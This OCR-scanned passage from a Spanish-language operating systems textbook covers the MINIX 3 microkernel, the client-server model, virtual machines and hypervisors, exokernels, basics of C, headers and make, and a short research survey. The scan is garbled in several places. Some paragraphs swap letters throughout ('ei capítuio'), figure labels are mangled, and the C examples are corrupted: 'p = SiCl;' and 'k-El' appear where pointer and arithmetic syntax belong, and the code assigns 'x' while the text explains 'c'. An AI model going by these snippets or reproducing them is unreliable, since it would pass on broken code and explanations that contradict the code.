madas al kernel para permitir que el resto del sistema operativo realice su trabajo. Estas llamadas 
realizan funciones tales como asociar los drivers a las interrupciones, desplazar datos entre espa¬ 
cios de direcciones e instalar nuevos mapas de memoria para los procesos recién creados. La es¬ 
tructura de procesos de M INIX 3 se muestra en la figura 1-26, en donde los manejadores de las 
llamadas al kernel se etiquetan como Sys. El manejador de dispositivo para el reloj también está 
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en el kernel, debido a que el planificador interactúa de cerca con él. Todos los demás dispositivos 
controladores se ejecutan como procesos de usuario separados. 


Modo J 
usuario' 
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(dÍ^ ( 



Proceso 


Programas 
de usuario 


Servidores 


Drivers 


Ei microkernei maneja interrupciones, 
procesos, pianificación, IPC 



[Ciock* Sys 


Figura 1-26. Estructura del sistema M INIX 3. 

Fuera del kernel, el sistema se estructura como tres capas de procesos, todos se ejecutan en mo¬ 
do usuario. La capa más inferior contiene los drivers de dispositivos. Como todos se ejecutan en 
modo usuario, no tienen acceso físico al espacio de puertos de E/S y no pueden emitir comandos de 
E/S directamente. En vez de ello, para programar un dispositivo de E/S el driver crea una estructu¬ 
ra para indicarle qué valores debe escribir en cuáles puertos de E/S y realiza una llamada al kernel 
para indicarle que realice la escritura. Esta metodología permite que el kernel compruebe que el dri¬ 
ver esté escribiendo (o leyendo) de la E/S que está autorizado a utilizar. En consecuencia (y a dife¬ 
rencia de un diseño monolítico), un driver de audio defectuoso no puede escribir accidentalmente 
en el disco. 

Encima de los drivers hay otra capa en modo usuario que contiene los servidores, que realizan 
la mayor parte del trabajo del sistema operativo. Uno o más servidores de archivos administran el 
(los) sistema(s) de archivos, el administrador de procesos crea, destruye y administra los procesos 
y así sucesivamente. Los programas de usuario obtienen servicios del sistema operativo mediante 
el envío de mensajes cortos a los servidores, pidiéndoles las llamadas al sistema POSIX. Por ejem¬ 
plo, un proceso que necesite realizar una llamada read envía un mensaje a uno de los servidores de 
archivos para indicarle qué debe leer. 

Un servidor interesante es el servidor de reencarnación, cuyo trabajo es comprobar si otros 
servidores y drivers están funcionando en forma correcta. En caso de que se detecte uno defectuo¬ 
so, se reemplaza automáticamente sin intervención del usuario. De esta forma, el sistema es auto- 
corregible y puede lograr una alta confiabilidad. 

El sistema tiene muchas restricciones que limitan el poder de cada proceso. Como dijimos an¬ 
tes, los drivers sólo pueden utilizar los puertos de E/S autorizados, pero el acceso a las llamadas al 
kernel también está controlado dependiendo del proceso, al igual que la habilidad de enviar mensa¬ 
jes a otros procesos. Además, los procesos pueden otorgar un permiso limitado a otros procesos pa¬ 
ra hacer que el kernel acceda a sus espacios de direcciones. Como ejemplo, un sistema de archivos 
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puede otorgar permiso al dispositivo controlador de disco para dejar que el kernel coloque un blo¬ 
que de disco recién leído en una dirección específica dentro del espacio de direcciones del sistema 
de archivos. El resultado de todas estas restricciones es que cada driver y servidor tiene el poder 
exacto para realizar su trabajo y no más, con lo cual se limita en forma considerable el daño que 
puede ocasionar un componente defectuoso. 

U na idea que está en parte relacionada con tener un kernel mínimo es colocar el mecanismo pa¬ 
ra hacer algo en el kernel, pero no la directiva. Para aclarar mejor este punto, considere la planifica¬ 
ción de los proceso. U n algoritmo de planificación relativamente simple sería asignar una prioridad 
a cada proceso y después hacer que el kernel ejecute el proceso de mayor prioridad que sea ejecuta¬ 
ble. El mecanismo, en el kernel, es buscar el proceso de mayor prioridad y ejecutarlo. La directiva, 
asignar prioridades a los procesos, puede realizarse mediante los procesos en modo usuario. De esta 
forma, la directiva y el mecanismo se pueden desacoplar y el kernel puede reducir su tamaño. 

1.7.4 M odelo cliente-servidor 

Una ligera variación de la idea del microkernel es diferenciar dos clases de procesos: los servido¬ 
res, cada uno de los cuales proporciona cierto servicio, y los clientes, que utilizan estos servicios. 
Este modelo se conoce como cliente-servidor. A menudo la capa inferior es un microkernel, pero 
eso no es requerido. La esencia es la presencia de procesos cliente y procesos servidor. 

La comunicación entre clientes y servidores se lleva a cabo comúnmente mediante el paso de 
mensajes. Para obtener un servicio, un proceso cliente construye un mensaje indicando lo que 
desea y lo envía al servicio apropiado. Después el servicio hace el trabajo y envía de vuelta la res¬ 
puesta. Si el cliente y el servidor se ejecutan en el mismo equipo se pueden hacer ciertas optimiza¬ 
ciones, pero en concepto estamos hablando sobre el paso de mensajes. 

Una generalización obvia de esta idea es hacer que los clientes y los servidores se ejecuten en 
distintas computadoras, conectadas mediante una red de área local o amplia, como se describe 
en la figura 1-27. Como los clientes se comunican con los servidores mediante el envío de mensa¬ 
jes, no necesitan saber si los mensajes se manejan en forma local en sus propios equipos o si se en¬ 
vían a través de una red a servidores en un equipo remoto. En cuanto a lo que al cliente concierne, 
lo mismo ocurre en ambos casos: se envían las peticiones y se regresan las respuestas. Por ende, el 
modelo cliente-servidor es una abstracción que se puede utilizar para un solo equipo o para una red 
de equipos. 

Cada vez hay más sistemas que involucran a los usuarios en sus PCs domésticas como clientes 
y equipos más grandes que operan en algún otro lado como servidores. De hecho, la mayor parte 
de la Web opera de esta forma. U na PC envía una petición de una página Web al servidor y la pá¬ 
gina Web se envía de vuelta. Éste es un uso común del modelo cliente-servidor en una red. 

1.7.5 Máquinas virtuales 

Las versiones iniciales del OS/360 eran, en sentido estricto, sistemas de procesamiento por lotes. 
Sin embargo, muchos usuarios del 360 querían la capacidad de trabajar de manera interactiva en 
una terminal, por lo que varios grupos, tanto dentro como fuera de IBM , decidieron escribir siste- 
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Mensaje dei ciiente 
ai servidor 


Figura 1-27. El modelo cliente-servidor sobre una red. 


mas de tiempo compartido para este sistema. El sistema de tiempo compartido oficial de IBM, co¬ 
nocido como TSS/360, se liberó después de tiempo y cuando por fin llegó era tan grande y lento 
que pocos sitios cambiaron a este sistema. En cierto momento fue abandonado, una vez que su de¬ 
sarrollo había consumido cerca de 50 millones de dólares (Graham, 1970). Pero un grupo en el 
Scientific Center de IBM en Cambridge, M assachusetts, produjo un sistema radicalmente distinto 
que IBM aceptó eventual mente como producto. Un descendiente lineal de este sistema, conocido 
como z/VM , se utiliza ampliamente en la actualidad, en las mainframes de IBM (zSeries) que se 
utilizan mucho en centros de datos corporativos extensos, por ejemplo, como servidores de comer¬ 
cio electrónico que manejan cientos o miles de transacciones por segundo y utilizan bases de datos 
cuyos tamaños llegan a ser hasta de varios millones de gigabytes. 


VM/370 

Este sistema, que en un principio se llamó CP/CM S y posteriormente cambió su nombre a VM/370 
(Seawrighty M acK innon, 1979), estaba basado en una astuta observación: un sistema de tiempo com¬ 
partido proporciona (1) multiprogramación y (2) una máquina extendida con una interfaz más conve¬ 
niente que el hardware por sí solo. L a esencia de V M /370 es separar por completo estas dos funciones. 

El corazón del sistema, que se conoce como monitor de máquina virtuai, se ejecuta en el 
hardware solamente y realiza la multiprogramación, proporcionando no una, sino varias máqui¬ 
nas virtuales a la siguiente capa hacia arriba, como se muestra en la figura 1-28. Sin embargo, a 
diferencia de otros sistemas operativos, estas máquinas virtuales no son máquinas extendidas, 
con archivos y otras características adecuadas. En vez de ello, son copias exactas del hardware, 
incluyendo el modo kernel/ usuario, la E/S, las interrupciones y todo lo demás que tiene la má¬ 
quina real. 

Como cada máquina virtual es idéntica al verdadero hardware, cada una puede ejecutar cual¬ 
quier sistema operativo que se ejecute directamente sólo en el hardware. Distintas máquinas virtua¬ 
les pueden (y con frecuencia lo hacen) ejecutar distintos sistemas operativos. En el sistema VM/370 
original, algunas ejecutaban OS/360 o uno de los otros sistemas operativos extensos de procesa¬ 
miento por lotes o de procesamiento de transacciones, mientras que otros ejecutaban un sistema in¬ 
teractivo de un solo usuario llamado CMS (Conversadonal Monitor System; Sistema monitor 
conversacionai) para los usuarios interactivos de tiempo compartido. Este último fue popular entre 
los programadores. 
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F ¡gura 1-28. L a estructura de V M /370 con C M S. 


Cuando un programa de CM S ejecutaba una llamada al sistema, ésta quedaba atrapada para el 
sistema operativo en su propia máquina virtual, no para VM/370, de igual forma que si se ejecuta¬ 
ra en una máquina real, en vez de una virtual. Después, CM S emitía las instrucciones normales de 
E/S de hardware para leer su disco virtual o lo que fuera necesario para llevar a cabo la llamada. 
Estas instrucciones de E/S eran atrapadas por la VM/370, que a su vez las ejecutaba como parte de 
su simulación del hardware real. Al separar por completo las funciones de multiprogramación y pro¬ 
porcionar una máquina extendida, cada una de las piezas podían ser más simples, más flexibles y 
mucho más fáciles de mantener. 

En su encarnación moderna, z/VM se utiliza por lo general para ejecutar varios sistemas ope¬ 
rativos completos, en vez de sistemas simplificados de un solo usuario como CMS. Por ejemplo, la 
seriezSeries es capaz de ejecutar una o más máquinas virtuales de Linux junto con los sistemas ope¬ 
rativos tradicionales de IBM. 

Redescubrimiento de ias máquinas virtuaies 

M i entras que IBM ha tenido un producto de máquina virtual disponible durante cuatro décadas, y 
unas cuantas compañías más como Sun M icrosystems y Hewlett-Packard han agregado reciente¬ 
mente el soporte de máquinas virtuales a sus servidores empresariales de alto rendimiento, la idea 
de la virtualización se había ignorado por mucho tiempo en el mundo de la PC, hasta hace poco. 
Pero en los últimos años, se han combinado nuevas necesidades, nuevo software y nuevas tecnolo¬ 
gías para convertirla en un tema de moda. 

Primero hablaremos sobre las necesidades. M uchas compañías han ejecutado tradicionalmen¬ 
te sus servidores de correo, servidores Web, servidores FTP y otros servidores en computadoras se¬ 
paradas, algunas veces con distintos sistemas operativos. Consideran la virtualización como una 
forma de ejecutarlos todos en la misma máquina, sin que una falla de un servidor haga que falle el 
resto. 

La virtualización también es popular en el mundo del hospedaje Web. Sin ella, los clientes de 
hospedaje Web se ven obligados a elegir entre el hospedaje compartido (que les ofrece sólo una 
cuenta de inicio de sesión en un servidor Web, pero ningún control sobre el software de servidor) y 
hospedaje dedicado (que les ofrece su propia máquina, lo cual es muy flexible pero no es costeable 
para los sitios Web de pequeños a medianos). Cuando una compañía de hospedaje Web ofrece la 
renta de máquinas virtuales, una sola máquina física puede ejecutar muchas máquinas virtuales. 
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cada una de las cuales parece ser una máquina completa. Los clientes que rentan una máquina vir¬ 
tual pueden ejecutar cualesquier sistema operativo y software que deseen, pero a una fracción del 
costo de un servidor dedicado (debido a que la misma máquina física soporta muchas máquinas vir¬ 
tuales al mismo tiempo). 

Otro uso de la virtualización es para los usuarios finales que desean poder ejecutar dos o más 
sistemas operativos al mismo tiempo, por decir Windows y Linux, debido a que algunos desús pa¬ 
quetes de aplicaciones favoritos se ejecutan en el primero y algunos otros en el segundo. Esta situa¬ 
ción se ilustra en la figura l-29(a), en donde el término "monitor de máquinas virtuales" ha 
cambiado su nombre por el de hipervisor de tipo 1 en años recientes. 
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1. (b) U n hipervisor de tipo 2. 


A hora pasemos al software. A unque nadie disputa lo atractivo de las máquinas virtuales, el pro¬ 
blema está en su implementación. Para poder ejecutar software de máquina virtual en una compu¬ 
tadora, su CPU debe ser virtualizable (Popek y Goldberg, 1974). En síntesis, he aquí el proble¬ 
ma. Cuando un sistema operativo que opera en una máquina virtual (en modo usuario) ejecuta una 
instrucción privilegiada, tal como para modificar el PSW o realizar una operación de E/S, es esen¬ 
cial que el hardware la atrape para el monitor de la máquina virtual, de manera que la instrucción 
se pueda emular en el software. En algunas CPUs (como el Pentium, sus predecesores y sus clo¬ 
nes) los intentos de ejecutar instrucciones privilegiadas en modo de usuario simplemente se igno¬ 
ran. Esta propiedad hacía que fuera imposible tener máquinas virtuales en este hardware, lo cual 
explica la falta de interés en el mundo de la PC. Desde luego que había intérpretes para el Pentium 
que se ejecutaban en el Pentium, pero con una pérdida de rendimiento de por lo general 5x a lOx, 
no eran útiles para un trabajo serio. 

Esta situación cambió como resultado de varios proyectos de investigación académicos en la 
década de 1990, como Disco en Stanford (Bugnion y colaboradores, 1997), que ocasionaron el sur¬ 
gimiento de productos comerciales (por ejemplo, VM ware Workstation) y que reviviera el interés 
en las máquinas virtuales. VM ware Workstation es un hipervisor de tipo 2, el cual se muestra en la 
figura l-29(b). En contraste con los hipervisores de tipo 1, que se ejecutaban en el hardware direc¬ 
to, los hipervisores de tipo 2 se ejecutan como programas de aplicación encima de Windows, Linux 
o algún otro sistema operativo, conocido como sistema operativo anfitrión. Una vez que se inicia 
un hipervisor de tipo 2, lee el CD-ROM de instalación para el sistema operativo huésped elegido 
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y lo instala en un disco virtual, que es tan sólo un gran archivo en el sistema de archivos del siste¬ 
ma operativo anfitrión. 

Cuando se arrancar el sistema operativo huésped, realiza lo mismo que en el hardware real; por 
lo general inicia algunos procesos en segundo plano y después una GUI. Algunos hipervisores tra¬ 
ducen los programas binarios del sistema operativo huésped bloque por bloque, reemplazando cier¬ 
tas instrucciones de control con llamadas al hipervisor. Después, los bloques traducidos se ejecutan 
y se colocan en caché para su uso posterior. 

Un enfoque distinto en cuanto al manejo de las instrucciones de control es el de modificar el 
sistema operativo para eliminarlas. Este enfoque no es una verdadera virtualización, sino paravir- 
tualización. En el capítulo 8 hablaremos sobre la virtualización con más detalle. 

La máquina virtual dej ava 

Otra área en donde se utilizan máquinas virtuales, pero de una manera algo distinta, es para ejecu¬ 
tar programas de java. Cuando Sun M icrosystems inventó el lenguaje de programación java, tam¬ 
bién inventó una máquina virtual (es decir, una arquitectura de computadora) llamada J VM (j ava 
Virtual M achine, M áquina virtual de java). El compilador de java produce código para la j VM, 
que a su vez típicamente se ejecuta mediante un software intérprete dej VM . La ventaja de este mé¬ 
todo es que el código de la jVM se puede enviar a través de Internet, a cualquier computadora que 
tenga un intérprete dej VM y se ejecuta allí. Por ejemplo, si el compilador hubiera producido pro¬ 
gramas binarios para SPARC o Pentium, no se podrían haber enviado y ejecutado en cualquier par¬ 
te con la misma facilidad. (Desde luego que Sun podría haber producido un compilador que 
produjera binarios de SPARC y después distribuir un intérprete de SPARC, pero j VM es una arqui¬ 
tectura mucho más simple de interpretar.) Otra ventaja del usodelajVM es que, si el intérprete se 
implementa de manera apropiada, que no es algo completamente trivial, se puede comprobar que 
los programas dejVM entrantes sean seguros para después ejecutarlos en un entorno protegido, de 
manera que no puedan robar datos ni realizar algún otro daño. 

1.7.6 Exokerneis 

En vez de clonar la máquina actual, como se hace con las máquinas virtuales, otra estrategia es par- 
ticionarla; en otras palabras, a cada usuario se le proporciona un subconjunto de los recursos. Así, 
una máquina virtual podría obtener los bloques de disco del 0 al 1023, la siguiente podría obtener 
los bloques de disco del 1024 al 2047 y así sucesivamente. 

En la capa inferior, que se ejecuta en el modo kernel, hay un programa llamado exokernel (En- 
glery colaboradores, 1995). Su trabajo es asignar recursos a las máquinas virtual es y después com¬ 
probar los intentos de utilizarlos, para asegurar que ninguna máquina trate de usar los recursos de 
otra. Cada máquina virtual de nivel de usuario puede ejecutar su propio sistema operativo, al igual 
que en la VM/370 y las Pentium 8086 virtuales, con la excepción de que cada una está restringida 
a utilizar sólo los recursos que ha pedido y que le han sido asignados. 

La ventaja del esquema del exokernel es que ahorra una capa de asignación. En los otros dise¬ 
ños, cada máquina virtual piensa que tiene su propio disco, con bloques que van desde 0 hasta cier- 
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to valor máximo, por lo que el monitor de la máquina virtual debe mantener tablas para reasignar 
las direcciones del disco (y todos los demás recursos). Con el exokernel, esta reasignación no es ne¬ 
cesaria. El exokernel sólo necesita llevar el registro para saber a cuál máquina virtual se le ha asig¬ 
nado cierto recurso. Este método sigue teniendo la ventaja de separar la multiprogramación (en el 
exokernel) del código del sistema operativo del usuario (en espacio de usuario), pero con menos so¬ 
brecarga, ya que todo lo que tiene que hacer el exokernel es mantener las máquinas virtuales sepa¬ 
radas unas de las otras. 

1.8 EL MUNDO SEGÚN C 

Por lo general los sistemas operativos son extensos programas en C (o algunas veces C ++) que 
consisten de muchas piezas escritas por muchos programadores. El entorno que se utiliza para de¬ 
sarrollar sistemas operativos es muy distinto a lo que están acostumbrados los individuos (como los 
estudiantes) al escribir pequeños programas en java. Esta sección es un intento de proporcionar una 
muy breve introducción al mundo de la escritura de sistemas operativos para los programadores 
inexpertos de java. 

1.8.1 El lenguajeC 

Ésta no es una guía para el uso deC, sino un breve resumen de algunas de las diferencias clave en¬ 
tre C y java, java está basado en C, por lo que existen muchas similitudes entre los dos. Ambos son 
lenguajes imperativos con tipos de datos, variables e instrucciones de control, por ejemplo. Los ti¬ 
pos de datos primitivos en C son enteros (incluyendo cortos y largos), caracteres y números de pun¬ 
to flotante. Los tipos de datos compuestos se pueden construir mediante el uso de arreglos, 
estructuras y uniones. Las instrucciones de control en C son similares a las de j ava, incluyéndolas 
instrucciones if, switch, for y while. Las funciones y los parámetros son aproximadamente iguales 
en ambos lenguajes. 

U na característica de C que j ava no tiene son los apuntadores explícitos. U n apuntador es una 
variable que apunta a (es decir, contiene la dirección de) una variable o estructura de datos. Consi¬ 
dere las siguientes instrucciones: 

char el, c2, *p; 

el ='x’; 

p = SiCl; 

c2 =*p; 

que declaran a el y c2 como variables de tipo carácter y a p como una variable que apunta a (es de¬ 
cir, contiene la dirección de) un carácter. La primera asignación almacena el código ASCII para 
el carácter 'c' en la variable el. La segunda asigna la dirección de el a la variable apuntador p. La 
tercera asigna el contenido de la variable a la que apunta p, a la variable c2, por lo que después de 
ejecutar estas instrucciones, c2 también contiene el código ASCII para 'c'. En teoría, los apuntado¬ 
res están tipificados, por lo que no se debe asignar la dirección de un número de punto flotante a un 


SECCION 1.8 


EL MUNDO SEGUN C 


73 


apuntador tipo carácter, pero en la práctica los compiladores aceptan dichas asignaciones, aunque 
algunas veces con una advertencia. Los apuntadores son una construcción muy potente, pero tam¬ 
bién una gran fuente de errores cuando se utilizan sin precaución. 

Algunas cosas que C no tiene son: cadenas integradas, hilos, paquetes, clases, objetos, seguri¬ 
dad de tipos y recolección de basura. La última es un gran obstáculo para los sistemas operativos. 
Todo el almacenamiento en C es estático o el programador lo asigna y libera de manera explícita, 
por lo general con las funciones de biblioteca malloc y free. Esta última propiedad (control total del 
programador sobre la memoria) junto con los apuntadores explícitos que hacen de C un lenguaje 
atractivo para escribirsistemas operativos. En esencia, los sistemas operativos son sistemasen tiem¬ 
po real hasta cierto punto, incluso los de propósito general. Cuando ocurre una interrupción, el sis¬ 
tema operativo sólo puede tener unos cuantos microsegundos para realizar cierta acción o de lo 
contrario, puede perder información crítica. Es intolerable que el recolector de basura entre en ac¬ 
ción en un momento arbitrario. 

1.8.2 Archivos de encabezado 

Por lo general, un proyecto de sistema operativo consiste en cierto número de directorios, cada uno 
délos cuales contiene muchos archivos .c que contienen el código para cierta parte del sistema, jun¬ 
to con varios archivos de encabezado .h que contienen declaraciones y definiciones utilizadas por 
uno o más archivos de código. Los archivos de encabezado también pueden incluir macros simples, 
tales como: 

#defineTAM_BUFER 4096 

las cuales permiten que el programador nombre constantes, de manera que cuando TAM_BUFER se 
utilice en el código, se reemplace durante la compilación por el número 4096. Una buena práctica 
de programación de C es nombrar cada constante excepto 0,1 y -1, y algunas veces también éstas 
se nombran. Las macros pueden tener parámetros, tales como: 

#define max(a, b) (a > b ? a : b) 

con lo cual el programador puede escribir: 

i = max(j, k-El) 

y obtener: 

i = (j > k-El ? j : k -E 1) 

para almacenar el mayor de j y k -i-1 en i. Los encabezados también pueden contener compilación 
condicional, por ejemplo: 

#ifdef PENTIUM 
¡ntel_int_ack(); 

#endif 

lo cual se compila en una llamada a la función intel_int_ack si la macro PENTIU M está definida y 
no hace nada en caso contrario. La compilación condicional se utiliza con mucha frecuencia para 
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aislar el código dependiente de la arquitectura, de manera que cierto código se inserte sólo cuando 
se compile el sistema en el Pentium, que se inserte otro código sólo cuando el sistema se compile 
en una SPARC y así sucesivamente. Un archivo .c puede incluir físicamente cero o más archivos de 
encabezado mediante la directiva #include. También hay muchos archivos de encabezado comunes 
para casi cualquier archivo .c, y se almacenan en un directorio central. 


1.8.3 Proyectos de programación extensos 

Para generar el sistema operativo, el compilador de C compila cada archivo .c en un archivo de có¬ 
digo objeto. Estos archivos, que tienen el sufijo .o, contienen instrucciones binarias para el equipo 
de destino. Posteriormente la CPU los ejecutará directamente. No hay nada como el código bytede 
java en el mundo de C. 

La primera pasada del compilador de C se conoce como preprocesador deC. A medida que 
lee cada archivo .c, cada vez que llega a una directiva #include va y obtiene el archivo de encabe¬ 
zado cuyo nombre contiene y lo procesa, expandiendo las macros, manejando la compilación con¬ 
dicional (y varias otras cosas) y pasando los resultados a la siguiente pasada del compilador, como 
si se incluyeran físicamente. 

Como los sistemas operativos son muy extensos (es común que tengan cerca de cinco millo¬ 
nes de líneas de código), sería imposible tener que recompilar todo cada vez que se modifica 
un archivo. Por otro lado, para cambiar un archivo de encabezado clave que se incluye en miles 
de otros archivos, hay que volver a compilar esos archivos. Llevar la cuenta de qué archivos de 
código objeto depende de cuáles archivos de encabezado es algo que no se puede manejar sin 
ayuda. 

Por fortuna, las computadoras son muy buenas precisamente en este tipo de cosas. En los sis¬ 
temas UNIX hay un programa llamado make (con numerosas variantes tales como gmake, pmake, 
etcétera) que lee el M akefile, un archivo que indica qué archivos son dependientes de cuáles otros 
archivos. Lo que hace make es ver qué archivos de código objeto se necesitan para generar el archi¬ 
vo binario del sistema operativo que se necesita en un momento dado y para cada uno comprueba 
si alguno de los archivos de los que depende (el código y los encabezados) se ha modificado des¬ 
pués de la última vez que se creó el archivo de código objeto. De ser así, ese archivo de código ob¬ 
jeto se tiene que volver a compilar. Cuando make ha determinado qué archivos .c se tienen que 
volver a compilar, invoca al compilador de C para que los recompile, con lo cual se reduce el nú¬ 
mero de compilaciones al mínimo. En los proyectos extensos, la creación del M akefile está propen¬ 
sa a errores, por lo que hay herramientas que lo hacen de manera automática. 

Una vez que están listos todos los archivos .o, se pasan a un programa conocido como enlaza- 
dor para combinarlos en un solo archivo binario ejecutable. Cualquier función de biblioteca quesea 
llamada también se incluye en este punto, se resuelven las referencias dentro de las funciones y se 
reasignan las direcciones de la máquina según sea necesario. Cuando el enlazador termina, el resul¬ 
tado es un programa ejecutable, que por tradición se llama a.out en los sistemas UNIX. Los diver¬ 
sos componentes de este proceso se ilustran en la figura 1-30 para un programa con tres archivos 
de C y dos archivos de encabezado. Aunque hemos hablado aquí sobre el desarrollo de sistemas 
operativos, todo esto se aplica al desarrollo de cualquier programa extenso. 
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Figura 1-30. El proceso de compilar archivos de C y de encabezado para crear un ar¬ 
chivo ejecutable. 


1.8.4 EI modelo del tiempo de ejecución 

Una vez que se ha enlazado el archivo binario del sistema operativo, la computadora puede reini¬ 
ciarse con el nuevo sistema operativo. Una vez en ejecución, puede cargar piezas en forma dinámi¬ 
ca que no se hayan incluido de manera estática en el binario, como los drivers de dispositivos y los 
sistemas de archivos. En tiempo de ejecución, el sistema operativo puede consistir de varios seg¬ 
mentos, para el texto (el código del programa), los datos y la pila. Por lo general, el segmento de 
texto es inmutable y no cambia durante la ejecución. El segmento de datos empieza con cierto ta¬ 
maño y se inicializa con ciertos valores, pero puede cambiar y crecer según lo necesite. Al princi¬ 
pio la pila está vacía, pero crece y se reduce a medida que se hacen llamadas a funciones y se 
regresa de ellas. A menudo el segmento de texto se coloca cerca de la parte final de la memoria, el 
segmento de datos justo encima de éste, con la habilidad decrecer hacia arriba y el segmento de pi¬ 
la en una dirección virtual superior, con la habilidad de crecer hacia abajo, pero los distintos siste¬ 
mas trabajan de manera diferente. 

En todos los casos, el código del sistema operativo es ejecutado directamente por el hardware, 
sin intérprete y sin compilación justo-a-tiempo, como seda el caso con java. 









76 


INTRODUCCION 


CAPITULO 1 


1.9 INVESTIGACIÓN ACERCA DE LOS 
SISTEMAS OPERATIVOS 

La ciencia computacionai es un campo que avanza con rapidez y es difícii predecir hacia dónde va. 
Los investigadores en universidades y ios iaboratorios de investigación industriai están desarroiian- 
do constantemente nuevas ideas, aigunas de ias cuaies no van a ningún iado, pero otras se convier¬ 
ten en ia piedra anguiar de futuros productos y tienen un impacto masivo en ia industria y en ios 
usuarios. Saber qué ideas tendrán éxito es más fácii en retrospección que en tiempo reai. Separar ei 
trigo de ia paja es en especiai difícii, debido a que a menudo se requieren de 20 a 30 años para que 
una idea haga impacto. 

Por ejempio, cuando ei presidente Eisenhower estabieció ia Agencia de Proyectos Avanzados 
de Investigación (ARPA) dei Departamento de Defensa en 1958, trataba de evitar que ei Ejército 
predominara sobre ia M arina y ia FuerzaAérea en reiación con ei presupuesto de investigación. No 
estaba tratando de inventar Internet. Pero una de las cosas que hizo ARPA fue patrocinar cierta in¬ 
vestigación universitaria sobre el entonces oscuro tema de la conmutación de paquetes, lo cual con¬ 
dujo a la primera red experimental de conmutación de paquetes, A RPANET. Entró en funcionamiento 
en 1969. Poco tiempo después, otras redes de investigación patrocinadas por A RPA estaban conecta¬ 
das a ARPANET,y nació Internet, que en ese entonces era utilizada felizmente por los investigado¬ 
res académicos para enviarse correo electrónico unos con otros durante 20 años. A principios de la 
década de 1990, Tim Berners-Lee inventó la World Wide Web en el laboratorio de investigación 
CERN en Ginebra y M are Andreesen escribió el código de un navegador gráfico para esta red en la 
Universidad de Illinois. De repente. Internet estaba llena de adolescentes conversando entre sí. Pro¬ 
bablemente el presidente Eisenhower esté revolcándose en su tumba. 

La investigación en los sistemas operativos también ha producido cambios dramáticos en los 
sistemas prácticos. Como vimos antes, los primeros sistemas computad onal es comerciales eran to¬ 
dos sistemas de procesamiento por lotes, hasta que el M .I.T. inventó el tiempo compartido interac¬ 
tivo a principios de la década de 1960. Todas las computadoras eran basadas en texto, hasta que 
Doug Engelbart inventó el ratón y la interfaz gráfica de usuario en el Stanford Research Institute a 
finales de la década de 1960. ¿Quién sabe lo que vendrá a continuación? 

En esta sección y en otras secciones equivalentes en el resto de este libro, daremos un breve 
vistazo a una parte de la investigación sobre los sistemas operativos que se ha llevado a cabo du¬ 
rante los últimos 5 a 10 años, sólo para tener una idea de lo que podría haber en el horizonte. En 
definitiva, esta introducción no es exhaustiva y se basa en gran parte en los artículos que se han pu¬ 
blicado en los principales diarios de investigación y conferencias, debido a que estas ideas han so¬ 
brevivido por lo menos a un proceso de revisión personal riguroso para poder publicarse. La 
mayoría de los artículos citados en las secciones de investigación fueron publicados por la ACM , la 
IEEE Computer Society o USENIX, que están disponibles por Internet para los miembros (estu¬ 
diantes) de estas organizaciones. Para obtener más información acerca de estas organizaciones y sus 
bibliotecas digitales, consulte los siguientes sitios Web: 

ACM http://www.acm.org 

IEEE Computer Society http://www.computer.org 

USENIX http://www.usenix.org 
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Casi todos los investigadores de sistemas operativos consideran que los sistemas operativos ac¬ 
tuales son masivos, inflexibles, no muy confiables, inseguros y están cargados de errores, eviden¬ 
temente algunos más que otros (no divulgamos los nombres para no dañar a los aludidos). En 
consecuencia, hay mucha investigación acerca de cómo construir mejores sistemas operativos. 
En fechas recientes se ha publicado trabajo acerca de los nuevos sistemas operativos (Krieger y co¬ 
laboradores, 2006), la estructura del sistema operativo (Fassino y colaboradores, 2002), la rectitud 
del sistema operativo (Elphinstoney colaboradores, 2007; Kumary Li, 2002; y Yang y colaborado¬ 
res, 2006), la confiabilidad del sistema operativo (Swifty colaboradores, 2006; y LeVasseury co¬ 
laboradores, 2004), las máquinas virtuales (Barham y colaboradores, 2003; Garfinkel y colaborado¬ 
res, 2003; King y colaboradores, 2003; y Whitaker y colaboradores, 2002), los virus y gusanos 
(Costa y colaboradores, 2005; Portokalidis y colaboradores, 2006; Tucek y colaboradores, 2007; y 
Vrable y colaboradores, 2005), los errores y la depuración (Chou y colaboradores, 2001; y King 
y colaboradores, 2005), el hiperhilamiento y el multihilamiento (Fedorova, 2005; y Bulpin y Pratt, 
2005), y el comportamiento de los usuarios (Yu y colaboradores, 2006), entre muchos otros temas. 


1.10 DESCRIPCIÓN GENERAL SOBRE EL RESTO 
DE ESTE LIBRO 

Ahora hemos completado nuestra introducción y un breve visión del sistema operativo. Es tiempo 
de entrar en detalles. Como dijimos antes, desde el punto de vista del programador, el propósito 
principal de un sistema operativo es proveer ciertas abstracciones clave, siendo las más importan¬ 
tes los procesos y hilos, los espacios de direcciones y los archivos. De manera acorde, los siguien¬ 
tes tres capítulos están dedicados a estos temas cruciales. 

El capítulo 2 trata acerca délos procesos y hilos. Describe sus propiedades y la manera en que se 
comunican entre sí. También proporciona varios ejemplos detallados acerca de la forma en que fun¬ 
ciona la comunicación entre procesos y cómo se pueden evitar algunos obstáculos. 

En el capítulo 3 estudiaremos los espacios de direcciones y su administración adjunta de me¬ 
moria con detalle. Examinaremos el importante tema de la memoria virtual, junto con los concep¬ 
tos estrechamente relacionados, como la paginación y la segmentación. 

Después, en el capítulo 4 llegaremos al importantísimo tema de los sistemas de archivos. Flas¬ 
ta cierto punto, lo que el usuario ve es en gran parte el sistema de archivos. Analizaremos la inter¬ 
faz del sistema de archivos y su implementación. 

En el capítulo 5 se cubre el tema de las operaciones de entrada/salida. Fl adiaremos sobre los 
conceptos de independencia de dispositivos y dependencia de dispositivos. Utilizaremos como 
ejemplos varios dispositivos importantes, como los discos, teclados y pantallas. 

El capítulo 6 trata acerca de los interbloqueos. Anteriormente en este capítulo mostramos en 
forma breve qué son los interbloqueos, pero hay mucho más por decir. Fl adiaremos también sobre 
las formas de prevenirlos o evitarlos. 

En este punto habremos completado nuestro estudio acerca de los principios básicos délos sis¬ 
temas operativos con una sola CPU. Sin embargo, hay más por decir, en especial acerca de los te¬ 
mas avanzados. En el capítulo 7 examinaremos los sistemas de multimedia, que tienen varias 
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propiedades y requerimientos distintos de ios sistemas operativos convencionaies. Entre otros de¬ 
mentas, ia pianificación de tareas y ei sistema de archivos se ven afectados por ia naturaieza de 
ia muitimedia. Otro tema avanzado esei de ios sistemas con múitipies procesadores, inciuyendo ios 
mu i ti procesadores, ias computadoras en paraieio y ios sistemas distribuidos. Cubriremos estos te¬ 
mas en ei capítuio 8. 

Un tema de enorme importancia es ia seguridad de ios sistemas operativos, que se cubre en ei 
capítuio 9. Entre ios temas descritos en este capítuio están ias amenazas (es decir, ios virus y gusa¬ 
nos), ios mecanismos de protección y ios modeios de seguridad. 

